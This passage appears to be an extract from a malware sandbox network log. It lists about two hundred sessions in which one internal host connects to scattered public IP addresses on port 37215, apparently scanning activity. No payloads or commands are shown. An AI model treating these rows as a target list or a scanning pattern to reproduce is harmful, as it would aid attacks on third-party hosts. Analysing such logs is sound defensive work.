                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4067192.168.2.1548110157.173.126.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4068192.168.2.1533610157.1.147.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4069192.168.2.155196641.68.251.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4070192.168.2.1547900197.200.3.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4071192.168.2.1551830157.100.176.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4072192.168.2.153492841.2.227.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4073192.168.2.1546952197.184.196.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4074192.168.2.155576876.44.87.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4075192.168.2.1560734197.104.82.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4076192.168.2.1557672160.75.155.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4077192.168.2.1546696197.47.196.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4078192.168.2.1546910197.3.219.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4079192.168.2.1550526157.130.116.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4080192.168.2.155660417.110.196.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4081192.168.2.1558048157.6.79.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4082192.168.2.1539394197.191.208.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4083192.168.2.1540982157.46.30.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4084192.168.2.1545474157.48.32.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4085192.168.2.1560382158.13.234.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4086192.168.2.155831241.0.238.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4087192.168.2.1532956157.103.226.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4088192.168.2.1551750197.22.90.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4089192.168.2.153931841.147.182.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4090192.168.2.1548854197.236.221.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4091192.168.2.153561684.182.36.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4092192.168.2.1559162157.176.29.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4093192.168.2.1537950157.240.194.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4094192.168.2.1541864157.152.181.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4095192.168.2.1535482157.100.52.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4096192.168.2.1536746157.89.106.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4097192.168.2.1533208158.92.187.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4098192.168.2.1552124157.200.220.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4099192.168.2.1559454197.59.62.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4100192.168.2.1546960157.248.154.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4101192.168.2.1546372157.198.156.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4102192.168.2.1544636100.188.219.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4103192.168.2.1539952144.228.229.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4104192.168.2.1545286157.242.225.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4105192.168.2.1546828156.141.255.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4106192.168.2.154395041.57.166.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4107192.168.2.1537686157.230.196.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4108192.168.2.1535300157.12.2.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4109192.168.2.1555674197.160.4.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4110192.168.2.1551400157.47.99.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4111192.168.2.1547138182.28.250.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4112192.168.2.1544452220.156.187.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4113192.168.2.1547218157.206.204.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4114192.168.2.153329041.215.80.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4115192.168.2.15336342.161.94.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4116192.168.2.1541020110.119.208.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4117192.168.2.1539482157.254.169.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4118192.168.2.1551450197.193.202.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4119192.168.2.1552330197.41.33.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4120192.168.2.1533428197.242.199.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4121192.168.2.154641641.17.98.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4122192.168.2.153790441.24.232.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4123192.168.2.1558834197.186.73.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4124192.168.2.156027241.49.20.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4125192.168.2.154189241.16.115.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4126192.168.2.1537004197.114.36.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4127192.168.2.156060441.9.210.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4128192.168.2.1550892157.115.128.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4129192.168.2.1554884197.0.9.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4130192.168.2.1560158162.165.162.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4131192.168.2.1545190197.197.200.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4132192.168.2.1554066157.147.230.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4133192.168.2.1556746187.76.134.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4134192.168.2.1555644157.246.59.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4135192.168.2.1560154157.230.123.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4136192.168.2.1560242209.220.191.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4137192.168.2.154017041.253.152.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4138192.168.2.1554146170.120.58.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4139192.168.2.155508841.197.79.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4140192.168.2.155047841.83.102.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4141192.168.2.1537368197.217.89.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4142192.168.2.1552336197.191.182.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4143192.168.2.1549608161.251.52.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4144192.168.2.1551160157.14.198.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4145192.168.2.1554814157.252.110.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4146192.168.2.154529247.6.197.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4147192.168.2.153476641.217.101.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4148192.168.2.155764041.55.227.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4149192.168.2.1551200157.36.121.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4150192.168.2.1548364157.100.207.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4151192.168.2.1554978197.202.219.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4152192.168.2.1535968157.2.54.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4153192.168.2.154238441.93.170.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4154192.168.2.1554412157.107.2.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4155192.168.2.1539228197.60.246.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4156192.168.2.1540944222.170.3.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4157192.168.2.1550486197.164.0.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4158192.168.2.1556328197.218.72.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4159192.168.2.1546462197.216.41.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4160192.168.2.153799641.203.190.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4161192.168.2.1560916132.100.134.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4162192.168.2.155419641.94.30.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4163192.168.2.1553828197.244.69.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4164192.168.2.1549902157.157.156.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4165192.168.2.1538602197.95.253.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4166192.168.2.1548178197.52.226.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4167192.168.2.154213641.241.228.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4168192.168.2.155472694.241.54.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4169192.168.2.156030241.180.66.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4170192.168.2.1554952197.138.126.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4171192.168.2.1559030157.139.186.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4172192.168.2.1546986157.13.215.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4173192.168.2.154734441.221.134.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4174192.168.2.154650669.106.109.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4175192.168.2.1542600197.23.248.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4176192.168.2.1547118197.47.196.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4177192.168.2.153928668.242.76.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4178192.168.2.155503487.145.4.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4179192.168.2.1555328157.46.224.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4180192.168.2.154823079.120.208.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4181192.168.2.1551322166.134.149.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4182192.168.2.1556848197.206.163.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4183192.168.2.1534772157.89.128.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4184192.168.2.1542456157.157.71.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4185192.168.2.1537614157.94.39.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4186192.168.2.154911841.150.123.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4187192.168.2.1560366157.15.241.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4188192.168.2.1547956157.47.84.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4189192.168.2.1537130157.235.156.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4190192.168.2.1556898152.162.192.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4191192.168.2.154533217.72.162.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4192192.168.2.1560904197.57.167.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4193192.168.2.1554208197.152.183.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4194192.168.2.153788090.220.79.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4195192.168.2.154572041.11.89.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4196192.168.2.1555110197.109.34.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4197192.168.2.155374053.45.89.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4198192.168.2.15558382.219.163.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4199192.168.2.1553116157.182.218.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4200192.168.2.1537686197.170.183.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4201192.168.2.155206641.17.86.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4202192.168.2.1548504197.117.104.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4203192.168.2.1560302157.205.194.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4204192.168.2.1540990197.8.128.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4205192.168.2.1556846197.252.152.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4206192.168.2.1538160197.136.217.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4207192.168.2.1538354157.29.88.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4208192.168.2.1546174157.220.181.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4209192.168.2.1542550197.172.46.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4210192.168.2.1560784197.72.171.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4211192.168.2.1550798157.212.97.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4212192.168.2.1556864197.249.161.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4213192.168.2.1546710157.155.172.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4214192.168.2.1553546157.225.106.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4215192.168.2.156018241.240.56.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4216192.168.2.1555912157.5.133.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4217192.168.2.153722083.61.149.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4218192.168.2.156008041.113.192.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4219192.168.2.155354468.205.129.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4220192.168.2.1534110157.24.221.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4221192.168.2.153703470.133.134.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4222192.168.2.1552900157.228.107.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4223192.168.2.1543436197.58.41.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4224192.168.2.1536828197.255.192.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4225192.168.2.155247441.21.23.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4226192.168.2.1556530197.76.58.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4227192.168.2.155643041.1.160.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4228192.168.2.1542840101.94.212.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4229192.168.2.1556204157.47.94.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4230192.168.2.153872441.234.179.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4231192.168.2.155176441.150.102.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4232192.168.2.1533890157.252.84.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4233192.168.2.154874041.73.53.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4234192.168.2.1552648105.94.87.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4235192.168.2.1551270185.17.9.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4236192.168.2.155791241.212.105.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4237192.168.2.153719241.181.225.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4238192.168.2.1539444197.34.74.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4239192.168.2.155189241.84.163.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4240192.168.2.1559536133.196.21.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4241192.168.2.1541798157.232.238.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4242192.168.2.154855864.75.245.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4243192.168.2.154009241.21.36.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4244192.168.2.1539788197.96.237.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4245192.168.2.1551136157.214.79.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4246192.168.2.1542444213.20.206.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4247192.168.2.1545490157.116.94.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4248192.168.2.155253499.69.177.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4249192.168.2.1551518197.152.252.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4250192.168.2.1535952170.246.88.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4251192.168.2.15536589.17.201.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4252192.168.2.153670841.161.30.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4253192.168.2.1537586157.24.165.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4254192.168.2.1553858157.252.170.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4255192.168.2.1545806183.74.119.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4256192.168.2.1545226157.189.104.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4257192.168.2.1548440157.154.170.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4258192.168.2.1550654221.51.32.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4259192.168.2.1535906122.245.232.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4260192.168.2.156096241.226.127.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4261192.168.2.153818442.41.0.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4262192.168.2.1535870197.235.183.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4263192.168.2.1547290157.203.136.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4264192.168.2.1539362197.83.170.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4265192.168.2.154896434.158.227.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4266192.168.2.1547888197.141.189.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4267192.168.2.1560294197.105.84.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4268192.168.2.1535996157.178.229.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4269192.168.2.1544386197.112.153.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4270192.168.2.154261214.16.12.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4271192.168.2.1535774197.77.213.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4272192.168.2.1548650219.171.18.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4273192.168.2.1552098157.174.88.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4274192.168.2.1534766197.147.195.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4275192.168.2.154894241.22.217.19937215
                                                          TimestampBytes transferredDirectionData


